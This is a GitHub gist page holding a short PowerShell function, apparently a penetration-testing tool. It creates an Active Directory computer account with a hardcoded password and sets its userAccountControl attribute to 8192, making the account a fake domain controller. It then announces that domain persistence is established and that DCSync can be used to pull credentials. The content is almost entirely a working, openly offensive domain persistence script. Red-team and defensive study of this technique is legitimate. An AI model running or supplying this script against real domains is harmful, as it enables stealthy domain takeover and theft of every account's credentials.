-
-
Save iamtutu/1b22d3ec817da01c5ab2a37490c7da7d to your computer and use it in GitHub Desktop.
Revisions
-
netbiosX created this gist
Jan 17, 2022 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,26 @@ function Execute-userAccountControl { [CmdletBinding()] param ( [System.String]$DomainFQDN = $ENV:USERDNSDOMAIN, [System.String]$ComputerName = 'Pentestlab', [System.String]$OSVersion = '10.0 (18363)', [System.String]$OS = 'Windows 10 Enterprise', [System.String]$DNSName = "$ComputerName.$DomainFQDN", $MachineAccount = 'Pentestlab' ) $secureString = convertto-securestring "Password123" -asplaintext -force $VerbosePreference = "Continue" Write-Verbose -Message "Creating Computer Account: $ComputerName" New-ADComputer $ComputerName -AccountPassword $securestring -Enabled $true -OperatingSystem $OS -OperatingSystemVersion $OS_Version -DNSHostName $DNSName -ErrorAction Stop; Write-Verbose -Message "$ComputerName created!" Write-Verbose -Message "Attempting to establish persistence." Write-Verbose -Message "Changing the userAccountControl attribute of $MachineAccount computer to 8192." Set-ADComputer $MachineAccount -replace @{ "userAccountcontrol" = 8192 }; Write-Verbose -Message "$MachineAccount is now a Domain Controller!" Write-Verbose -Message "Domain persistence established!You can now use the DCSync technique with Pentestlab credentials." $VerbosePreference = "Continue" }